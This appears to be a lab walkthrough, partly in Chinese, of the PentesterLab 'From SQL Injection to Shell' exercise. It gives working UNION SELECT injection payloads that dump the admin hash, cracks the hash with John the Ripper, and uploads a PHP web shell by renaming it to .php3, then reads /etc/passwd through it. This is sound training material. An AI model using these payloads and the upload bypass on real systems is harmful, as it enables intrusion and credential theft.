From SQL Injection to Shell
Reference
Writeup
- Retrieving information
- 漏洞參數:
/cat.php?id=
- Payload:
- 資料庫版本: 5.1.63-0+squeeze1
UNION SELECT 1,@@version,3,4 - 目前使用者: pentesterlab@localhost
UNION SELECT 1,current_user(),3,4 - 目前資料庫: photoblog
UNION SELECT 1,database(),3,4 - Tables: categories, pictures, users
UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema != 'information_schema' - Columns: id, title, img, cat, login, password
UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_schema != 'information_schema' - 帳號與密碼: admin:8efe310f9ab3efeae8d410a8e0166eb2
UNION SELECT 1,concat(login,':',password),3,4 FROM users;
- 資料庫版本: 5.1.63-0+squeeze1
- 漏洞參數:
- Cracking the password
- Online MD5 hash decode得到密碼為: P4ssw0rd
- 或使用John-The-Ripper
$ john password --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt --rules Using default input encoding: UTF-8 Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3]) Press 'q' or Ctrl-C to abort, almost any other key for status P4ssw0rd (admin)
- Uploading a Webshell and Code Execution
- 上傳
shell.php: 由於限制副檔名php的關係,無法正常上傳,更改為.php3或.php.test即可成功上傳<?php system($_GET['cmd']); ?> - 接著必須知道上傳檔案路徑
- 隨便上傳圖片,查看原始碼
<img src="admin/uploads/board_cover.jpg" alt="board" /> - 因此上傳的
shell.php3就會在admin/uploads/shell.php3
- 隨便上傳圖片,查看原始碼
- 執行commands:
- http://10.0.2.151/admin/uploads/shell.php3?cmd=uname -a
- Linux debian 2.6.32-5-686 #1 SMP Sun May 6 04:01:19 UTC 2012 i686 GNU/Linux
- http://10.0.2.151/admin/uploads/shell.php3?cmd=ls
- board_cover.jpg cthulhu.png hacker.png ruby.jpg shell.jpg shell.php.test shell.php3
- http://10.0.2.151/admin/uploads/shell.php3?cmd=id
- uid=33(www-data) gid=33(www-data) groups=33(www-data)
- http://10.0.2.151/admin/uploads/shell.php3?cmd=cat /etc/passwd
- http://10.0.2.151/admin/uploads/shell.php3?cmd=uname -a
- 上傳